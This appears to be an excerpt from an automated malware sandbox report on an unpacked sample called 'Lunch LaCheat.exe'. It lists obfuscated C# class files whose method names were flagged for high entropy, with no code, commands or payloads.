                        Source: 34.3.Lunch LaCheat.exe.39bb5b0.0.raw.unpack, Thw6BMqwvwHF16riBkP.csHigh entropy of concatenated method names: '_6H9', 'YZ8', '_66N', 'G9C', 'DXXyLe6YjtAoUAlR400', 'IsQInp6JBBf6Bax69i9', 'RrgwEw62ZWLWR5FdqKm', 'nJmgoR68sn0tOY8nH2p', 'YDje1g6GePELr76Akld', 'UkWNYr6z9qJd2t0UiHX'
                        Source: 34.3.Lunch LaCheat.exe.39bb5b0.0.raw.unpack, OKOFf3AyEOTeQ8sF02.csHigh entropy of concatenated method names: '_468', 'YZ8', '_2M1', 'G9C', 'HHARG2BfYWdYMpdL3vl', 'yqnvCRBmK9is93gbZw5', 'RAdw8XBlerWmPNMHejV', 'tBcVD7BrGUwGmKKlW1U', 'V53aXFBDCHnwZbTRin8', 'fjI1qBBN3EMlGrTwMVj'
                        Source: 34.3.Lunch LaCheat.exe.39bb5b0.0.raw.unpack, iWMFUTm5Qgip1Z9i3E.csHigh entropy of concatenated method names: 'f1HRteHcI', 'KLh84nVgP', 'wkfh2Pa3I', 'Tp5OiNLJJ', 'tybeBsmlv', 'FegawM7Yt', 'Ku0CqOYbu', 'PKpGNPcyg7aCyWqRSYn', 'pV5Pahcqqo1MKYaLtGX', 'RpdF43c9ENdB4rxPv91'
                        Source: 34.3.Lunch LaCheat.exe.39bb5b0.0.raw.unpack, suwuZqqUaCC4bv2jsNt.csHigh entropy of concatenated method names: 'K55', 'YZ8', '_9yX', 'G9C', 'sAHwBF6dCOL3BN4shTu', 'dLDqJK64nHlexilVgsx', 'yJLm8S6Za6VXOQa402f', 'aIAlpp6ade7u8qbGyOX', 'PSKl916S7BgsIc6XHEM', 'KOA13J6sJdCf3N482rU'
                        Source: 34.3.Lunch LaCheat.exe.39bb5b0.0.raw.unpack, bUKS09MsXqrMAhvIgjN.csHigh entropy of concatenated method names: 'LVkZ7ydJL1', 'RXHZgcq7kE', 'spJZSRmYhS', 'nYPaFINUATgOmD2wdj3', 'avDaptNhqOKZG3eGdIL', 'OR93XGNT6Xj1A8YDkQk', 'KmXl6UNecbQwCXrqvXN', 'yJ6ZXvuweT', 'CvGZw7UVGr', 'JyaZJQgawe'
                        Source: 34.3.Lunch LaCheat.exe.39bb5b0.0.raw.unpack, r1Nd7VMgjpfgH8UhQxo.csHigh entropy of concatenated method names: 'CQFJxOA333', 'GPlJFtAkWb', 'twOJQmTxvP', 'zFOKUnDdD04qbhNC0yh', 'WHPR53D4h4jXhm4myGP', 'RDpdGxDZmn1Zwm7je4L', 'AtyTDdDavXYI4CjUynr', 'rsElwBDSV37y8BAOoeX', 'nYNKVTDsrCsQdvXY4Ar', 'MwpeOGDVh3NZsXZT7X7'
                        Source: 34.3.Lunch LaCheat.exe.39bb5b0.0.raw.unpack, Fioc1Eq5kI2Wt8Yw2K3.csHigh entropy of concatenated method names: 'd43', 'YZ8', 'g67', 'G9C', 'pe8Y567gq5BdfHvRsHG', 'fycxlI7jSB8cgfDGNOp', 'jCO1mL7FZccHMJ3VyCm', 'kIkAFj7bdSYdMSAh8Np', 'kar2iO71X55aoCpyS4x', 'enfFTM7OVdnv3amTJ84'
                        Source: 34.3.Lunch LaCheat.exe.39bb5b0.0.raw.unpack, dVUBQucrV6vLHbsrlB.csHigh entropy of concatenated method names: '_59M', 'YZ8', '_1zA', 'G9C', 'Sx2g3IQEkNSyapVAdBm', 'ptGwXiQCWH9aZxJjeOS', 'R6XEt4Qpghm4myNgS0A', 'EnaSu1Qo508gWs5LXdV', 'oZdGeGQuOnEbNesrKRw', 'nDI3xxQhPTyyaEyjr35'
                        Source: 34.3.Lunch LaCheat.exe.39bb5b0.0.raw.unpack, bWvKHFeX1fCoZwKOW0.csHigh entropy of concatenated method names: 'T43', 'YZ8', '_56i', 'G9C', 'D4idk5n0rHxOIMbXBpD', 'j99aY5nAJp7JVUikfi0', 'kjbyW8nROFsLNZpHQJ6', 'jTMKvkniuyvkpf3VChZ', 'YZHjornPXX4SAkLd81W', 'slmX5gnXcGpNtg8Lc7I'
                        Source: 34.3.Lunch LaCheat.exe.39bb5b0.0.raw.unpack, gKJnY3fffZyAJh7UTXY.csHigh entropy of concatenated method names: 'RUNfjSb3Gb', 'qYlfxlZg75', 'SwJfFiM21b', 'z65fQeKRl3', 'jvXfYxaNYC', 'NTOflNCx0T', 'JFajgeRfh54h82epLwk', 'IXH5CyRmGleZOV1rM2I', 'Q73ZJmRWIuIR6u6KGDB', 'Od9WKuRwpETgG1aBejd'
                        Source: 34.3.Lunch LaCheat.exe.39bb5b0.0.raw.unpack, v1H9NwqEOJDUB1tm5YX.csHigh entropy of concatenated method names: 'NKxfBJ9gEb', 'z1Tf6PI5PK', 'WyaLBQ0AmR8piRUljVY', 'xAvxBW09gEq0CG7AUy3', 'JgGt2K00mDjaXfxpECQ', 'CYkRpL0RaLhodWbkQKH', 'HnjsTg0i36s9WZlKYfM', 'L03M900P13ChX4MvafH', 'TIpof00XSGngI1vTvvj', 'SF0ZoB0WgDTwMsMjVcH'
                        Source: 34.3.Lunch LaCheat.exe.39bb5b0.0.raw.unpack, Fnr6ywMQNBPcTXUFQeh.csHigh entropy of concatenated method names: '_3VT', 'O5t', '_1W5', 'IT02B0NaA8', 'Qjt5q4hF13', 'Cyo2606ER3', 'vko5IrU3jc', 'sDiMNXtp85QCCZP79fg', 'rsYW6lto7dgftD01ift', 'r0Su44tE2uY5h1WWjtd'
                        Source: 34.3.Lunch LaCheat.exe.39bb5b0.0.raw.unpack, wqRwrbX1J1I0lijql3J.csHigh entropy of concatenated method names: 'qyJ5TjUBrcELHDypRVR', 'okjImSUIpVSNypJkCGa', 'LULUEqUnkXXGocgk3ky', 'mRBREgUQCPKKyohB9iq', 'qjpO9d8jf1', 'WM4', '_499', 'lYROp9AR7q', 'xQjOdZft1Z', 'TfaOc8KN6Z'
                        Source: 34.3.Lunch LaCheat.exe.39bb5b0.0.raw.unpack, SnxHSTqDkQ0SnKZtlax.csHigh entropy of concatenated method names: 'yiQ', 'YZ8', '_5li', 'G9C', 's6IhVny5iCelJ8n2iZ5', 'bMhYt5yciBLIP5L6eew', 'CX02B3ynMkPf0nmVUtp', 'oMPJH7yQv8t8cvAnt4I', 'NXqCtlyB1LE0DFyDUv4', 'EsokVRyI9Xb9FF5MMqS'
                        Source: 34.3.Lunch LaCheat.exe.39bb5b0.0.raw.unpack, zmTxvPtB3JXpW99rT2g.csHigh entropy of concatenated method names: '_4J6', '_5Di', '_1y5', '_77a', '_1X1', '_7fn', 'OUK', '_8S4', 'wUn', '_447'
                        Source: 34.3.Lunch LaCheat.exe.39bb5b0.0.raw.unpack, nKFhZaGINSnlIuOGr6.csHigh entropy of concatenated method names: '_52Y', 'YZ8', 'Eg4', 'G9C', 'oU4K1Tb85', 'Dj5REmnlY70lckCAcCY', 'qqChvVnrHb4tv0pesFG', 'hJsE6fnDqDqZAxYKs03', 'eCPPmMnNVMOi2NJ8FYU', 'lIaM53n3hgmj0mlweVl'
                        Source: 34.3.Lunch LaCheat.exe.39bb5b0.0.raw.unpack, MZcSW5XFnMZt2tTbkg5.csHigh entropy of concatenated method names: 'Aj5CmemkBa', '_1kO', '_9v4', '_294', 'qpbCu8eZ1t', 'euj', 'MOiCRpBV8q', 'AeaC8rGIAN', 'o87', 'lb1Cho7prW'
                        Source: 34.3.Lunch LaCheat.exe.39bb5b0.0.raw.unpack, WWqZNXK75NEoPq9OON.csHigh entropy of concatenated method names: '_23T', 'YZ8', 'ELp', 'G9C', 'QNjyldQJYfb7F6L0bLM', 'ssMcBqQ2AgGWB1IgPnB', 'o2aqMYQ8P280noQTDmF', 'GSCGFYQGOiA1roIXyaY', 'PI3mSKQz1S28VLSo76D', 'dKVWDhB5Pf6DTg4wcVp'
                        Source: 34.3.Lunch LaCheat.exe.39bb5b0.0.raw.unpack, mVPDZufZM2W7mkK879j.csHigh entropy of concatenated method names: 'J2UMbVjRB6', 'wLOM18f94l', 'bRDM9RQIua', 'FCCMpiX6Rh', 'zCuMdgCvtb', 'VVjMcclkjW', 'cmGMTsVGNs', 'WvRvtyixcFHmYmeLPBl', 'vecaksi3AcyP4Q2SSkc', 'B21HkIitdPNVhIQbKia'
                        Source: 34.3.Lunch LaCheat.exe.39bb5b0.0.raw.unpack, jnVE0AqQ75AvvmYSO4D.csHigh entropy of concatenated method names: '_7v4', 'YZ8', '_888', 'G9C', 'NEOdEQ0O8F4GBDd9q3v', 'ANwRux0vVtbqoP3mbIo', 'bf7KUY0LWWhMWRwFqNq', 'dTeDGm0MtXA15BKAT4q', 'MBV3610Ee14N1BUI0C4', 'IauNtu0CQvuFhNmEbxV'
                        Source: 34.3.Lunch LaCheat.exe.39bb5b0.0.raw.unpack, GXbGVUq9ec7tQ7QY4FA.csHigh entropy of concatenated method names: 'CorqlPm0EZ', 'dbCT6b9xt4SIjwGcTpo', 'Cc23qw9Hqw51fELBEUP', 'YqP1vO93KQCXtLglce7', 'qKypAP9tH44l4i9GFWP', 'Ut14gR9kUUP4DYoGUC0', 'QLw', 'YZ8', 'cC5', 'G9C'
                        Source: 34.3.Lunch LaCheat.exe.39bb5b0.0.raw.unpack, S4xuYYf4VvkDUfoJrma.csHigh entropy of concatenated method names: 'KmItHy8RCX', 'hfvtP2Yevb', 'fKgfm6XxBJm57GNKGjt', 'gkZKx3XHYrOWnbe0sTQ', 'vhEvxIX37eiiOpQw5vM', 'cdE2eEXtTCVwNauLgZc', 'JCtPOqXku8GaQnNosNH', 'erP1AoXgwSSZCm0IOnB', 'S1qVpaXj6TCm7j3DOi9', 'oFfOsFXFEYwfmI07iEk'
                        Source: 34.3.Lunch LaCheat.exe.39bb5b0.0.raw.unpack, spviIXXITu8HiQLRydd.csHigh entropy of concatenated method names: 'K20h4TKijO', 'P5uhVdQO1L', 'pn4hIRSyqM', 'ERehmlw0LM', 'wtphusGQWs', 'cLQyeou26FrYqdVs4PA', 'kwTChXu8ZTKPtB0WkkT', 'zkRfCquGBv3XTY00Tcp', 'yqmxEJuznAIeCmuCpIQ', 'jVq0sjh5xhViu2lD1ig'
                        Source: 34.3.Lunch LaCheat.exe.39bb5b0.0.raw.unpack, bjx4PUMNvrbRTipVjsL.csHigh entropy of concatenated method names: 'bSGuPSxCqQx8COVogUR', 'IZdvcXxpbntIBs2jPE1', 'wde6TExMAm1KLhlWrIY', 'IqpQkRxEW58S5H1aEn6', 'IWF', 'j72', 'hdI2ScsE9M', 'FTh2DLjhNr', 'j4z', 'APh23kPe0K'
                        Source: 34.3.Lunch LaCheat.exe.39bb5b0.0.raw.unpack, DNSXGhMxb8hbaZ3ZyOl.csHigh entropy of concatenated method names: '_9YY', '_57I', 'w51', 'bHN5MRYiSF', '_168', 'YE1x18tHjJndhXtjI9G', 'Es2Tc8tk1D98Hs9mLfo', 'mjdPxOtgNK89UKGrREt', 'MqejK6tjvtqcoqfFc80', 'rUdYc2tFBN5Bu275YvO'
                        Source: 34.3.Lunch LaCheat.exe.39bb5b0.0.raw.unpack, mGRo5IqgkpbCevtLJw4.csHigh entropy of concatenated method names: '_981', 'YZ8', 'd52', 'G9C', 'HlnkvJ7VPsCs6ZsASYh', 'YaUZWc7KWWp7fikmkBL', 'mFT2oW7Y3Kmq8Aaa870', 'T044587JtvcIy7SB7hw', 'PEtD9772RffA43EytyE', 'nCuIXI781myahKHrcWj'
                        Source: 34.3.Lunch LaCheat.exe.39bb5b0.0.raw.unpack, n5BLl0zub6q1E6cKtB.csHigh entropy of concatenated method names: 'Y29', 'YZ8', 'jn6', 'G9C', 'Tr9Fr96QgZuIYdCN7KJ', 'h0hgxw6BnAWv6j2DTTg', 'hrl1Np6I3KlBF7Fw5PU', 'CxNYl1662OsmSNJRpj2', 'KwCnSn67Df9xTZgkGCj', 'bhXF276yG03fALrguhy'
                        Source: 34.3.Lunch LaCheat.exe.39bb5b0.0.raw.unpack, d1Ms4CUYfOkEyT4rV8O.csHigh entropy of concatenated method names: '_14Y', 'b41', 'D7Y', 'xMq', 'i39', '_77u', '_4PG', '_5u8', 'h12', '_2KT'
                        Source: 34.3.Lunch LaCheat.exe.39bb5b0.0.raw.unpack, zyKIFSUOvZVd5nfJLNC.csHigh entropy of concatenated method names: 'qmhRTovydL', 'MDgRKRD95d', 'oPLRrjc0QR', 'I4ZRnSZmWU', 'EflRWEh8pQ', 'BShREYCj3FSd17ynq3w', 'M1aqNuCkx4yqBE7nkZQ', 'XhX3gfCgCHt5HO7OYOE', 'wlZqSiCFub9p6BpSV8G', 'kk00a4CbebRhf5yS9E1'
                        Source: 34.3.Lunch LaCheat.exe.39bb5b0.0.raw.unpack, wiSwb7XyiTFNRrZRITR.csHigh entropy of concatenated method names: 'P7f8owehxD', 'oer8EZtJhj', 'UaU8jJEEsk', 'b3M8xOxYte', 'XYR8FBIV12', 'CCe8Qhns0d', '_838', 'vVb', 'g24', '_9oL'
                        Source: 34.3.Lunch LaCheat.exe.39bb5b0.0.raw.unpack, LyW9xXtR93TyJkM7URN.csHigh entropy of concatenated method names: '_45b', 'ne2', '_115', '_3vY', 'wqRHywrbJ1', '_3il', 'u0lHqijql3', 'gNKHfvtbRv', '_78N', 'z3K'
                        Source: 34.3.Lunch LaCheat.exe.39bb5b0.0.raw.unpack, JLb518Xu0gr7VgNrdQG.csHigh entropy of concatenated method names: 'IGD', 'CV5', 'yo0hR4v39K', '_3k4', 'elq', 'hlH', 'yc1', 'Y17', '_2QC', 'En1'
                        Source: 34.3.Lunch LaCheat.exe.39bb5b0.0.raw.unpack, zWT2AgqN8s5bxJgQo4x.csHigh entropy of concatenated method names: 'LU4fsRYhw6', 'koYq7XA6VkFOldRJlt5', 'ccRkdYA7c8aLwhFmU7A', 's94O9bABd6YMGKmZJR3', 'spfTZbAIiNkRdF5jqg4', 'kwVPm9AysBEtBOyjXnq', '_5q7', 'YZ8', '_6kf', 'G9C'
                        Source: 34.3.Lunch LaCheat.exe.39bb5b0.0.raw.unpack, Sb38j9M5TwPKU5E3N8P.csHigh entropy of concatenated method names: '_223', 'ObchL9DfKqx2y8KPI5B', 'zjyL8gDmB4BA5tX7Sfy', 'AwD8o0Dl8nau0GJDmZc', 'KcrNg3DrrGXhKKACSCj', 'doGS2gDDLcw7qKJHgUc', 'BGYtIMDNCUM0F2OihNl', 'KNcso5D3h3X9yXtwoPg', 'EWsr58DtvoPG6EmKuHn', 'hUx1kPDxpqXCnZMBpOj'
                        Source: 34.3.Lunch LaCheat.exe.39bb5b0.0.raw.unpack, hYxb1wtLnXrN0rRtimV.csHigh entropy of concatenated method names: 'ICU', 'j9U', 'IBK', '_6qM', 'Amn', 'Mc2', 'og6', 'z6i', '_5G6', 'r11'
                        Source: 34.3.Lunch LaCheat.exe.39bb5b0.0.raw.unpack, I9vhRHquCQ0uLDtMftj.csHigh entropy of concatenated method names: 'kNf', 'YZ8', 'U31', 'G9C', 'm6JOx8yMVT2AMFy8MY0', 'iN5JtyyE8TQ2EHIq3IW', 'abuNRQyCZQ2s77Z74kO', 'UocsYxypvl32uvLQbW3', 'nU3W9ryo2MCKBXibePA', 'Pj5imPyuBcytTng08QB'
                        Source: 34.3.Lunch LaCheat.exe.39bb5b0.0.raw.unpack, ckfw2rtlq8EL44wGQV0.csHigh entropy of concatenated method names: 'rsKPLncwwW', 'L6sP9D7GLP', 'MY3PpHxxvt', 'DxqPdKmpmu', 'BmxPcxeGN8', 'KNWPTCeMTY', 'UR2PKMeayj', 'EiKPrlj1Li', 'yVFPnZuxop', 'BO6PW9RhMe'
                        Source: 34.3.Lunch LaCheat.exe.39bb5b0.0.raw.unpack, diijDZfkEAwvm72umcW.csHigh entropy of concatenated method names: 'CsNw8U53TQ', 'lJPbMhmS8Ct7f7ZO0ZG', 'yD6n0FmZlZeDciG0APA', 'OeK0bpmaqdd0OZNZgDw', 'oVKeupms4HPDKNBNLGA', 'Sbvr4MmVIw5cXP5kZdL', 'mmFw3GkEYg', 'sEAwshq5Hq', 'Db9w47p6oR', 'waSwV8Ztq9'
                        Source: 34.3.Lunch LaCheat.exe.39bb5b0.0.raw.unpack, w22xDBMq7bbo3Ga2veg.csHigh entropy of concatenated method names: 'a1vwCr4fti', 'H9mw0we9aC', 'H0awGgssIu', 'yMIwbRkDE9', 'WYHFxumzDsJZ9jDMjSS', 'jEYH21m8eJJ0NNVD1em', 'Yvp70SmGvJRg5At98tT', 'wyuwNBl5bUYGD9NeyHR', 'DttIPmlcBQFUZdNx5p9', 'U98xMblnDjicSGj2F1B'
                        Source: 34.3.Lunch LaCheat.exe.39bb5b0.0.raw.unpack, whZPVLpQKsuh7sYp2i.csHigh entropy of concatenated method names: '_3OK', 'YZ8', '_321', 'G9C', 'usrtRen8XF05jgBeSKi', 'iA6vWdnGYWrQkMlHeC4', 'l7OCiwnzMUcQmb87Osk', 'nC8VUBQ5xMr7HXTLLeK', 'uhMiPYQcaVJ4N9J6BUD', 'xMoQmfQnNypsK1NrACC'
                        Source: 34.3.Lunch LaCheat.exe.39bb5b0.0.raw.unpack, U9iiGtqq03BTIAdKv3Z.csHigh entropy of concatenated method names: 'tO4', 'YZ8', '_4kf', 'G9C', 'MWp64P6l3ipq2GQuntq', 'NKk4Cp6rF0ol1VXhsFw', 'qMa3Jf6DVGAjhyhE3Gk', 'CQ7w8K6NJoBOIue0qoV', 'W5ZNGH63RabL7XgnpOX', 'ciHJmY6t1kLtuVC1IHH'
                        Source: 34.3.Lunch LaCheat.exe.39bb5b0.0.raw.unpack, a8RCXJfyfv2YevbKcJy.csHigh entropy of concatenated method names: 'B1if86EUeO', 'S19fhnlUDc', 'q8LfOHkBZc', 'i8PI4bAvDM9b9C1Xgh1', 'Cjs6HFALJ6AotLk64Gn', 'k7tPmVAMa10WT9riQZC', 'RK6pTsAE4SL2ivvxpdm', 'A6du3SACOq2v6xgKLiP', 'Jh5fROApOWD9HUyQRqh', 'VakGRmA1KCKrxMSk1r5'
                        Source: 34.3.Lunch LaCheat.exe.39bb5b0.0.raw.unpack, HhoQgiQALbTCJrMygA.csHigh entropy of concatenated method names: '_8Ok', 'YZ8', 'InF', 'G9C', 'QiiUNSIXBAa3MTvUOCu', 'FMZ4lwIWh3SWU7SMwhc', 'Dvab0iIwYdJln3b6nk9', 'QBsabpIfvHk0tYu8ngM', 'CGH9NqImjKdoJaB95FM', 'MjsYO4Ilq6RGO1ZSVb9'
                        Source: 34.3.Lunch LaCheat.exe.39bb5b0.0.raw.unpack, COtroIUMm4eTIhOVxcs.csHigh entropy of concatenated method names: 'TuZJLpv3X3ZUXuQfMa8', 'DF0hVAvt5o5TjW3LAAV', 'CbpBQ2vDPJtbSFjQn9Q', 'K06NIQvNmxcx4okoToY', 'pU54RJwarE', 'qNaD9IvkyZLLLSYXZ2n', 'VaPEBQvglhuPkTng7gV', 'IN55Q0vxkE4ufGioIQp', 'oqy7ePvHEFuZLvApOym', 'CwS4T7vjvRGJ6EdnGY3'
                        Source: 34.3.Lunch LaCheat.exe.39bb5b0.0.raw.unpack, vf0yC3MIHlCBxsJ9ID0.csHigh entropy of concatenated method names: '_525', 'L97', '_3t2', 'UL2', '_6V2', '_968', 'tpM09X3i2kDDKar9Dx1', 'Jf8Z0S3PleVt01dPpCm', 's3WKbg3X3ht23eatxyW', 'zs5Vnd3WtIuHS3SNqll'
                        Source: 34.3.Lunch LaCheat.exe.39bb5b0.0.raw.unpack, DNaNPDq8ZrMGeZQIvVs.csHigh entropy of concatenated method names: 'p23', 'YZ8', 'Gog', 'G9C', 'E8lgLoy4DIupouCkFA4', 'qfMJ48yZiBo1MF6E6xD', 'Dnsdi7yadExYH8nmDvK', 'aaZ2GJySG17b0RKM8v6', 'ruelhNys0Mlegy5yhFb', 'EmpKriyV2eww67jAxOj'
                        Source: 34.3.Lunch LaCheat.exe.39bb5b0.0.raw.unpack, yDct3lUiBGykwYgZyNe.csHigh entropy of concatenated method names: 'q4Y', '_71O', '_6H6', 'Ywp8uokPlx', '_13H', 'I64', '_67a', '_71t', 'fEj', '_9OJ'
                        Source: 34.3.Lunch LaCheat.exe.39bb5b0.0.raw.unpack, kNoIPAUkfQUI8omLQgL.csHigh entropy of concatenated method names: 'FBq8eOs3Gj', 'iYk8aS7c0M', 'F8e', 'bLw', 'U96', '_71a', 'O52', 'BhA8CKD54d', '_5f9', 'A6Y'
                        Source: 34.3.Lunch LaCheat.exe.39bb5b0.0.raw.unpack, JrnQWOUZjgUWBocdi9j.csHigh entropy of concatenated method names: 'MBRR4bRWZh', 'dljRVGDLuG', 'beok0xEKNU8oE97cVXm', 'gdJirtEYGwQsYO7TH7X', 'G79xv5EJNEIAhGT5SiY', 'QoDxrPE2nhOSeIhOmfP', 'K3u9F7E8gfcuJwL8ZKH', 'XY1BBlEGogCG7BLkJjZ', 'IWvHJ4EzyO62oyRATuK', 'ooaaDoC5R7I1otPmy6D'
                        Source: 34.3.Lunch LaCheat.exe.39bb5b0.0.raw.unpack, bakGY7MAQ9F1Mugfu6e.csHigh entropy of concatenated method names: '_5u9', 'spk5eP4tNn', 'TM82y63WOc', 'xlo5n38cPv', 'ijDmsq32Cuo0nkm71h4', 'pmmlbH38FgC7IgeCmJx', 'NW4GNa3GCqSCis5YyYb', 'mWl4Li3YuWPoZcZMbjd', 'km51sx3JGusXZGV2HKS', 'qjQnvL3zVIiVitrQV2c'
                        Source: 34.3.Lunch LaCheat.exe.39bb5b0.0.raw.unpack, xDRQIuqra1CCiX6RhhC.csHigh entropy of concatenated method names: 'WoGfqhwXAd', 'YrnffWIkRQ', 'r7XfMuFUTP', 'PYTUgp9slmjF66T3pwk', 'Ia5Xxi9Vf27RNkwaMvK', 'WrE7er9aBcWYBHcsRZ6', 'TaeQa99STGLKXrARlj9', 'aPsyRx9KgUfkIPH8rdh', 'KFxKGc9YHNCliTOGYpD', 'QgrFic9JXw9Kxa2Ttx1'
                        Source: 34.3.Lunch LaCheat.exe.39bb5b0.0.raw.unpack, nfeO3JM26UEN4nRJB4s.csHigh entropy of concatenated method names: 'ryxJ1InLAp', 'RHUJ9E29Lj', 'oSNJpITRLy', 'G2fDwUDPjNV9ZqkedFq', 'syRVjODRUQgkNx8k4KP', 'MG67KADi32EoMii2f3c', 'sT2QmfDXYPr5JaU64AZ', 'QOpJ7GmX6g', 'QfIJgjDLxw', 'acyJSkOeR2'
                        Source: 34.3.Lunch LaCheat.exe.39bb5b0.0.raw.unpack, u7wHE5XO1AwJPYHADRh.csHigh entropy of concatenated method names: 'D4M', '_4DP', 'HU2', '_4Ke', '_5C9', '_7b1', 'lV5', 'H7p', 'V5L', '_736'
                        Source: 34.3.Lunch LaCheat.exe.39bb5b0.0.raw.unpack, wvbMxJXf3x1mW0ua4by.csHigh entropy of concatenated method names: 'vqbhJIrxhk', 'XIphZm7Lvs', '_8r1', 'ld4h2Y3rX2', 'Rw8hBdLFuK', 'D4Vh6BjHGm', 'ctAh5E2Uxm', 'sglmWPuWU0lZAiHDmmf', 'ORxqW4uwxm5BQ07tA5t', 'w4VfNvufi4GME3bSXCO'
                        Source: 34.3.Lunch LaCheat.exe.39bb5b0.0.raw.unpack, AjATmTqxd3qnyspZ8M5.csHigh entropy of concatenated method names: '_625', 'YZ8', '_9pX', 'G9C', 'HRIIYd0DFlTC15rYUVP', 'mfIPn10NrKEZSHpfdli', 'PNnWnR03P9hG97s8Bl3', 'jSP2Cd0tWTrMIgKLQvC', 'HqKcYM0x20fOVq54Itl', 'RtP49V0H5kTojw65eOq'
                        Source: 34.3.Lunch LaCheat.exe.39bb5b0.0.raw.unpack, tuX3ojf34ChaxjRV6c1.csHigh entropy of concatenated method names: 'ghyMzmrMjj', 'GmityahLUc', 'XnGtqsvKl7', 'CwUtfEAeQC', 'gjXtMu01OW', 'J2Attg8s5b', 'QJgtUQo4xj', 'q40tXDejK9', 't9HtwGj4xZ', 'oEntJkXhwB'
                        Source: 34.3.Lunch LaCheat.exe.39bb5b0.0.raw.unpack, dTG2gXqPUXjsYC5a9HK.csHigh entropy of concatenated method names: 'rU3', 'YZ8', 'M54', 'G9C', 'gfA0Ju7oAp3APN5QL3C', 'eZuBA77ufnak5Wpyrgk', 'Dw99V67ha1rIRYe4Vq3', 'Hntrf37TKJpcDOdMdxc', 'jTckxA7UpNRoPA5bZOJ', 'XRP1sP7eydMZwiP1WHa'
                        Source: 34.3.Lunch LaCheat.exe.39bb5b0.0.raw.unpack, sHZJEsfKSVh1hmkvGfT.csHigh entropy of concatenated method names: 'zu5XJPnKAU', 'zwnXZTO1PP', 'doVHscfY2QU7y7n3M6h', 'DHJBGlfJchy0NpVeDY1', 'LdV8eMfVkHTJJlF33VL', 'bBU0WFfKxvYr9Xmxf1T', 'WijXSDZEAw', 'MrPWHnm50A7nn7X0Nbk', 'YvnqISmcdn5vSrLYj2i', 'LMfGohfGAKwhojfkFgx'
                        Source: 34.3.Lunch LaCheat.exe.39bb5b0.0.raw.unpack, COhgSqfcQyyy2PSOJQt.csHigh entropy of concatenated method names: '_0023Nn', 'Dispose', 'VSZU9M3hJ2', 'C35Upi0Ohg', 'pqQUdyyy2P', 'pOJUcQtL6R', 'CIsUTckToo', 'YXanqqfqhHSyA5ZR5IF', 'tOWOCQf9atQ2ptEERAZ', 'qlcaEGf7oTCAAyOB3oA'
                        Source: 34.3.Lunch LaCheat.exe.39bb5b0.0.raw.unpack, IYPXUgwBGoP6ag9jkCy.csHigh entropy of concatenated method names: 'c2HFvottUIahn', 'woorDbdXE0xTAYhMF0X', 'uNoJwbdW3AWhGTAQrxp', 'VnGffcdwfhM8aLCcLn8', 'SdFVEVdfu82GL510GMs', 'H9mrWodm0RYjQ0ahgOh', 'IIbfdRdixl71rfT5QOD', 'vAv2eFdPIA5BilCQAop', 'axohCLdl4aoI35uNqyP', 'rPVPQkdrFr6cLrseYA7'
                        Source: 34.3.Lunch LaCheat.exe.39bb5b0.0.raw.unpack, KhVMlxXdSTGZrYZBTyq.csHigh entropy of concatenated method names: 'kjMacqd8Y1', 'dFM8QiUbOiNT3Wlx0o2', 'pAyrlDU1lyp62ZjBqB9', 'C38oNPUj1lyraUDysZK', 'w6QCLhUF0jmyoJeOycs', '_1fi', 'ILXeQHPI2t', '_676', 'IG9', 'mdP'
                        Source: 34.3.Lunch LaCheat.exe.39bb5b0.0.raw.unpack, kMDXZWXajKvT3fbPySM.csHigh entropy of concatenated method names: 'so7OZOmXcS', 'seBO2wr13U', 'Wx0OBVxFAh', '_3Gf', '_4XH', '_3mv', '_684', '_555', 'Z9E', 'BgAO6GC7rc'
                        Source: 34.3.Lunch LaCheat.exe.39bb5b0.0.raw.unpack, t7eqoCq0pyA24xXUAbH.csHigh entropy of concatenated method names: 'evhqoFZ4P6', 'JsQfJC9ns5pCW5j6Tnf', 'JAoZp69QZvQqimDDTpb', 'pCKSdX95nALImpr7vLg', 'Y3k8MI9cPRFS30v5Oyr', 'UVr5F79BUJGC0yGL74u', 'wo6Vld9IE4g2E8H1jLL', 'B63ltQ96yh2GL5gwWIl', 'oiAqjLbTCJ', 'ECTyE49qwm3bGTHUN6L'
                        Source: 34.3.Lunch LaCheat.exe.39bb5b0.0.raw.unpack, LdmVhiXGwe9HapiwJ8M.csHigh entropy of concatenated method names: '_159', 'rI9', '_2Cj', 'TAXO8Cmnut', 'vrLOhm8dlH', 'lcQOOs0Sxx', 'zIYOeFJCIF', 'R5aOahOv5j', 'PslOCWUtKC', 'et4lt6TCIDuEr6rKuQq'
                        Source: 34.3.Lunch LaCheat.exe.39bb5b0.0.raw.unpack, UhmLkBf9fCvwgVYUfIA.csHigh entropy of concatenated method names: 'qlhUCmLkBf', 'AAWA8rw8JUlo7bj2IaY', 'aX3CKrwGKWf2XWiRpaP', 'KBeZMSwJJIVXm09Apou', 'hyc9HQw2JR8whLRhLc7', 'n00GNtwzblx8nC54JSQ', 'aeNhdAf5DcNWWJ3tCm5', 'kJ3fdTfcnhvxlTjh2c9', 'xKmModfnBy0oOACwRu5', 'hdv74ffQZ2tmZ3HEhpS'
                        Source: 34.3.Lunch LaCheat.exe.39bb5b0.0.raw.unpack, GmeW25faKmNu3TDH8lC.csHigh entropy of concatenated method names: 'm6ItLu1ZjH', 'WVLtkWQbIi', 'iQ4tzxuYYV', 'VkDUyUfoJr', 'varUq8YInh', 'Bv1UfxxBty', 'jpeUMd3Gwn', 'ffrUt61Kw5', 'EYYUUZrHdC', 'KfNEPTWYJNYa4KaQ8lI'
                        Source: 34.3.Lunch LaCheat.exe.39bb5b0.0.raw.unpack, AM3dUaMPMLKtx58w5dK.csHigh entropy of concatenated method names: 'AOVJWefvU5', 'VUSJAFTekW', 'QAXJopur5Z', 'f8kJE1fDDg', 'mNZBiUDLQdo7fX17ZBY', 'wGIy5jDMdiueJuQpas0', 'W3TALFDEgsuXNX9Z2is', 'AT5QLEDOyuw53EOOgdu', 'pruHwBDvqlqlFTXC7gs', 'gww8HDDCKEfkOOWGwbE'
                        Source: 34.3.Lunch LaCheat.exe.39bb5b0.0.raw.unpack, EU7jgPqZUfCh0MEvB0O.csHigh entropy of concatenated method names: '_3fO', 'YZ8', '_48A', 'G9C', 'JTKaa4777mfR36hCoHA', 'CpD0lE7yQdshseIwquJ', 'iH8cej7qsWR75prafpN', 'IZHsn479V12L7VHBJSQ', 'BgoW2570jjuUXFQBHNp', 'DUnnj07Ato88UNW52uw'
